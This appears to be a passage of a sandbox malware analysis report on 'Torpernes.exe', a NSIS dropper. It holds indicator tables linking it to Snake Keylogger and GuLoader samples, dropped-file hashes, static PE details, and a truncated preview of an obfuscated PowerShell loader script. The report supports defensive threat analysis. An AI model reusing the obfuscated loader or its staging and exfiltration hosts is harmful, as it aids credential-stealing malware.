                                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                          • filetransfer.io/data-package/eadkqsUM/download
                                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                          • filetransfer.io/data-package/4jaIXkvS/download
                                          158.101.44.242DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          reallyfreegeoip.orgConfirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 172.67.177.134
                                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.96.3
                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.96.3
                                          checkip.dyndns.comConfirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                          • 132.226.247.73
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 132.226.247.73
                                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.247.73
                                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 132.226.247.73
                                          domzeleni.kzndplanernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 185.98.5.168
                                          Bespot.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 185.98.5.168
                                          api.telegram.orgLisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          Install.msiGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 149.154.167.220
                                          z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                          • 149.154.167.220
                                          Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                          • 149.154.167.220
                                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRUBootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                          • 149.154.167.99
                                          LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 149.154.167.99
                                          LisectAVT_2403002C_67.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 149.154.167.99
                                          LisectAVT_2403002C_81.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          CraxsRat VIP.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.99
                                          Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          f84038a5c35557bb57839423dcab27287ac5ab490fca503f496df61da5e2bc99.exeGet hashmaliciousBdaejec, VidarBrowse
                                          • 149.154.167.99
                                          CLOUDFLARENETUSNB4EASbynx.msiGet hashmaliciousLummaCBrowse
                                          • 188.114.96.3
                                          Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.97.3
                                          Scan file.docGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          LisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          LisectAVT_2403002C_16.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.12.205
                                          nX1oQE2we8.exeGet hashmaliciousCryptOne, QbotBrowse
                                          • 104.21.34.74
                                          LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
                                          • 188.114.96.3
                                          gbl.exeGet hashmaliciousUnknownBrowse
                                          • 104.26.4.75
                                          LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
                                          • 188.114.97.3
                                          gbl.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.68.40
                                          ORACLE-BMC-31898USLisect_AVT_24003_G1B_67.exeGet hashmaliciousUnknownBrowse
                                          • 158.101.28.51
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          counter.exeGet hashmaliciousBdaejecBrowse
                                          • 158.101.87.161
                                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 158.101.44.242
                                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 158.101.44.242
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 158.101.44.242
                                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.130.0

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          54328bd36c14bd82ddaa0c04b25ed9adConfirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.96.3
                                          Lisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          Lisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          Lisect_AVT_24003_G1B_127.exeGet hashmaliciousPureLog StealerBrowse
                                          • 188.114.96.3
                                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                                          • 188.114.96.3
                                          Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.96.3
                                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 188.114.96.3
                                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          3b5074b1b5d032e5620f69f9f700ff0eLisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          LisectAVT_2403002C_16.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                                          • 149.154.167.220
                                          Lisect_AVT_24003_G1A_33.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          Lisect_AVT_24003_G1B_84.msiGet hashmaliciousAteraAgentBrowse
                                          • 149.154.167.220
                                          Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          DD Spotify Acc Gen.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                          • 149.154.167.220
                                          Lisect_AVT_24003_G1B_127.exeGet hashmaliciousPureLog StealerBrowse
                                          • 149.154.167.220
                                          37f463bf4616ecd445d4a1937da06e19LisectAVT_2403002C_159.exeGet hashmaliciousBdaejec, DarkSideBrowse
                                          • 185.98.5.168
                                          nX1oQE2we8.exeGet hashmaliciousCryptOne, QbotBrowse
                                          • 185.98.5.168
                                          LisectAVT_2403002C_160.exeGet hashmaliciousUpatreBrowse
                                          • 185.98.5.168
                                          Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                          • 185.98.5.168
                                          LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                          • 185.98.5.168
                                          LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                          • 185.98.5.168
                                          LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 185.98.5.168
                                          LisectAVT_2403002C_67.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 185.98.5.168
                                          LisectAVT_2403002C_64.exeGet hashmaliciousUnknownBrowse
                                          • 185.98.5.168
                                          LisectAVT_2403002C_81.exeGet hashmaliciousVidarBrowse
                                          • 185.98.5.168

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):8003
                                          Entropy (8bit):4.840877972214509
                                          Encrypted:false
                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                          MD5:106D01F562D751E62B702803895E93E0
                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                          C:\Users\user\AppData\Local\Temp\Contentious.exe

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Category:dropped
                                          Size (bytes):1283968
                                          Entropy (8bit):7.384565087462512
                                          Encrypted:false
                                          SSDEEP:24576:qZbqxGFMhCGa7cQPncULq/YWx7k83oD1dEUu28KkzFu7biFA:ybqxGFMhCGa7cQ0ULxWx6MXLFgbi+
                                          MD5:ECC4FF0EE7D123F0E90587EA3A7B9AE3
                                          SHA1:70E6F747F9BAE57619817BEB11F836FA8A873726
                                          SHA-256:1E0A46FD7B7B0706D4D5918BA666ABDCCCC67BE4BE89874B5CB2CA9EA8B12A83
                                          SHA-512:28F1D457D0A8556CF0BD62FC33556B22D3307E0527A25D451877BCAA9B76B1595D5170E5A221491007D2E8CA5E3A5F384C556F40830576DC942AA0252DBE8A71
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................^...*.......1.......p....@.................................[#....@..................................t..................... ...`............................................................p...............................text....].......^.................. ..`.rdata..T....p.......b..............@..@.data................v..............@....ndata...P...............................rsrc...............|..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Contentious.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem

                                          Download File
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:ASCII text, with very long lines (54418), with no line terminators
                                          Category:dropped
                                          Size (bytes):54418
                                          Entropy (8bit):5.380872173369229
                                          Encrypted:false
                                          SSDEEP:1536:AsNKLSSANLNd+FFzONIjxMoqrnDlHIgiRYX3sJkLOcY:AFLSPE1MEI7K1YX3u0OcY
                                          MD5:B77B0DEE3BF32770AF375C4C87E19478
                                          SHA1:D97F7CF179F27860AC856437F256D8A473497472
                                          SHA-256:05CB2B925D951BF1348C00B0B69B21E9EA7F8C4F3022636E89EED64C043BAF78
                                          SHA-512:2A389AF9BBC0A656F4FC1249E4F2ABDA08C578B54AB141308836D246BA9AE8CC9268E4182147692530EA39484BC794184321C355821654E39CC771B18D500A65
                                          Malicious:true
                                          Reputation:low
                                          Preview:$Frugtbarhed=$Trskelpriserne90;<#Knackwurst Corpuscularian Unsportiveness #><#Skrivestuen Hieronymic Albion #><#Prologs Hexateuch Bndelormenes Nonofficeholding Uredo Mesectoderm #><#Dokkes Hjerteimpulsens Hulkingness Pluvioscopic Byeworkman #><#Jdedommen Vms Nationalbudgetterne Sololier Earpick Olymp #><#Teston Jubilumsmiddage Forhaandslaanets Vejet Netvrksprinter Nonmembership Udskrabningen #>$Erhvervsmand = " Sev ; Im,i`$ TropS StorkEn.iny,eodidZ bujePre,epPisser.eanda S,vemSpurpsTramp1Grist7pa as5 pilf=Com,o`$ExtraCBreaketampelEksamlStalduchundlbiogro.elikiPrecod nosoepleu,n Disks Enerr V,lgaTacannDokstdStatssBri ekInexpaSuperthomontTridee,asted In reSelvtsSigis; ForsF L.xiuUndesnBlotlcVersetBese,iEpiteoTumernBrans Trunca ernrfInfi,gJasmiiMucklf.ntibtTigers ,erisAfva k ml,er .ernuBansheTurnvn ynde Brais(Sen.t`$ EkskTVand.n Fin,d ByguiInternPriong A hesSmrebnC.okfgPipefl CheeeDerivnK.rtesSooch1Sideb3Total1 Damo, Benz Vand,`$PolytD nbeelobbyftribeiEmotenRa,ioi FjertAnt,ri.erros Ove.e

                                          C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Sildefdnings.pre

                                          Download File
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):328797
                                          Entropy (8bit):7.815397462071498
                                          Encrypted:false
                                          SSDEEP:6144:gRGYT84P6OIpXGZP31SmNYayhBJxWj9DlcK77hA456in:MT84COSsFSdaCxYn
                                          MD5:6CA54912856A504C6D0347BD9B57DDFD
                                          SHA1:7C9354362785D249DF664498EAD9AE7246F244FE
                                          SHA-256:0E91233482A61EB85E81D38C4E838E7B2157A27431CF6180BDBD4B995C35AAFA
                                          SHA-512:D5F868C39390B2AE6A571292F96B802D0401B3F57607B6769D3B566DC6E632CB61036372142930F51746785C03EA0EE31C69BF4B3351E718A093879BFB77D7B1
                                          Malicious:false
                                          Preview:.zz....../.......q....._................FFF......mmmmm......I........A........................BB..t...............WWWW.....ff...>.%.....|.T............ooooo........U.........-..........k....T.W......''''''........<<.o.((...D."..............'............O......-........N...........h..r....................ff............................8.|................ss....888..............................h....................yy............I...FFF......$.66......l.......>.....>>>>.............b........f..........0....i...................H.*.......o....zz.....=.......................)..............&&..............;..o..............WW.1.................FFFF.{{{..s........u.<<..............'.........................................7.33...........QQ...............}."....ss.@.................NN....9........88...... .FFFFF.-....................%%......a.t..11...%%%...................333.......WWW.....S.................''..........;..@........$$.....//////.........."...NNNNNN....O..............K..pp.E......

                                          C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\genfortl.kom

                                          Download File
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):944215
                                          Entropy (8bit):1.253403336418641
                                          Encrypted:false
                                          SSDEEP:1536:UyGaAJZQVIsL4WNkRjeGXJIp9Oc52NVuN75fZTD5p1v5E1bkGgMF/3tDLREMUPS+:UyGxUL4a6vXJIWhru791ublLeDPS0ASD
                                          MD5:1CB1238607E8954A7923966A49CDB3E0
                                          SHA1:BFF6A1E896BB0BE28E1BFCFD0094BCD36078D849
                                          SHA-256:6A76541EE87E4E7E547F500D01CC9D50EE681DBF067FE8D4E5735F5BD22AC999
                                          SHA-512:4B691C9C24C15DA18B9C3F221333692F1CA364B96765AE94EC01FD2BF004449A57DDE3E6E89B8A567DA2FC05F53BA7FBA853AC8B367F298A1C444CCC5F3DAE5F
                                          Malicious:false
                                          Preview:..................&................}..........A.;.............'........................"...............k............................................................................................................B..............................K.................Z......................................q........................^............................_....5.............v.............c....2.......^..........................................................&........."..D.*0.........................................w.....(......w...............................................................K....v...........................v.........................................>...................................................................+.a......$.._........7.............................`..........[......................................................................................................................{.......G....................b..]................................................

                                          C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\leucocythaemia.lob

                                          Download File
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):962689
                                          Entropy (8bit):1.2611239746227794
                                          Encrypted:false
                                          SSDEEP:3072:3wRHrOD/R6APMwv2g5tvYRY0zgsRVL7YapsU7:3KHri/3P20wRB8CYE77
                                          MD5:5318799C0891E41C4824B117782D972C
                                          SHA1:B7708ECD85A69E6158EA05A6B5BDC1B8CE826199
                                          SHA-256:254A5A9B8B3F20A38A993C62D3F16EE3F7D98176769F97C58248C27C77A4C032
                                          SHA-512:9AA1B82B35C17D11B57749B399F4280F2D2FD111AA8523E1FA7CB82DBAC3A968F3CBE09310B4A592550517CC10F2EDCE63F919AE1399FD8160D55B0A8E65866E
                                          Malicious:false
                                          Preview:.Q........................................................m................................................................d.................................................#..............................................................................................!..@...............2...............................................................................Z............................^.............\.......A..................... .....l.....<...P......................3...........................E..........................................-.............................................................9..................1....=....`...q................3.............d.....g..................J..o......*.......................................................................g..............Z........................................................;..e....@.......................................................a....9......w{.......................................................B.."........

                                          C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\teknonom.txt

                                          Download File
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):258
                                          Entropy (8bit):4.211163838509549
                                          Encrypted:false
                                          SSDEEP:6:zDW+YfJM8yFa2cip84JmfABwvPDOrCK6ZLtpAS/cV0rg1CkFL:ChMzFa2cip8MDwvPDOrXS4Ag1C+L
                                          MD5:17EACC32277AC454B9E9981F5E3EA80B
                                          SHA1:6D18F25A482B59AB8AC0D485D9594A147320B396
                                          SHA-256:C03BC7EDD150C4DC8A88F160D8863489F09AACEE6F9CE5071E0D962332522A6C
                                          SHA-512:2854AE7B957D8DD01436DB85587E61B348990452E546785C907A50CE0253338CAA1CA268800426243B35C11BDAA32CFC8115A1FC8F4E9081B8DA36822CD107A7
                                          Malicious:false
                                          Preview:damebladets skips modeskaber trillingfdslers tilgodeskrevne..lysforhold strofernes mbelfabrikants.forhoret straahattes almuemblernes,relaterede deratized overslight,tailordom faggoty allene unhushed nonavoidableness reallotting..eufomaniens taletidens media.

                                          C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\discontiguous.alk

                                          Download File
                                          Process:C:\Users\user\Desktop\Torpernes.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):802681
                                          Entropy (8bit):1.2504268364374471
                                          Encrypted:false
                                          SSDEEP:1536:NKhLrR2iZCjGIP8dRVIVuLWjmO7fg7RKVFw+UPDsVTWD04FMUtdmTWO5XQc/G9vp:URN2sRoTzFB6D046UOPJu9vvio
                                          MD5:176BA5DE5FE97864B7468DD8BCE8C38E
                                          SHA1:01804C24EDC45329980BF040FCF8EFFFAF4B471D
                                          SHA-256:84DFBA8A9B3F62629795FA225C836FDCD3708595325E98F6248E3C72A4DD6C9B
                                          SHA-512:EC9E44DA08D30FC5241BB06792127530993B038A1B0C20A546241EAD3663AFCFD2E4C02F73465A0723E1D9E7DF10FCB6C19888776911C49F646ABF6EB5E70254
                                          Malicious:false
                                          Preview:`..........T.................................................................Eg..............................Zy.......................................!......7............................................_.....................................................?........../...u....................H...........p.............|...........................................................y................................e...................u...................<..............>....................i..........My.......................S.............f..............................+..................7..................H..................8..................../...........n..P3....z............u..n..................................h.....{.....V..................................................................................................................D........................?Z.....r.................................K......D.........................................................................j.......

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqmzalva.ybv.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1fjdjsr.czb.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.384565087462512
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Torpernes.exe
                                          File size:1'283'968 bytes
                                          MD5:ecc4ff0ee7d123f0e90587ea3a7b9ae3
                                          SHA1:70e6f747f9bae57619817beb11f836fa8a873726
                                          SHA256:1e0a46fd7b7b0706d4d5918ba666abdcccc67be4be89874b5cb2ca9ea8b12a83
                                          SHA512:28f1d457d0a8556cf0bd62fc33556b22d3307e0527a25d451877bcaa9b76b1595d5170e5a221491007d2e8ca5e3a5f384c556f40830576dc942aa0252dbe8a71
                                          SSDEEP:24576:qZbqxGFMhCGa7cQPncULq/YWx7k83oD1dEUu28KkzFu7biFA:ybqxGFMhCGa7cQ0ULxWx6MXLFgbi+
                                          TLSH:0655D0153A49890ED2936B788E58F37A5764DFCD3A16830296F0CDB7F9ACD8BAD405C0
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................^...*.......1.......p....@

                                          File Icon

                                          Icon Hash:49f571b3129a9201

                                          Static PE Info

                                          General

                                          Entrypoint:0x4031ff
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x55C15CE0 [Wed Aug 5 00:46:24 2015 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:7ed0d71376e55d58ab36dc7d3ffda898

                                          Authenticode Signature

                                          Signature Valid:false
                                          Signature Issuer:CN="Vicegerents Nolendes ", O=Slvknappede, L=Rockwood, S=Michigan, C=US
                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
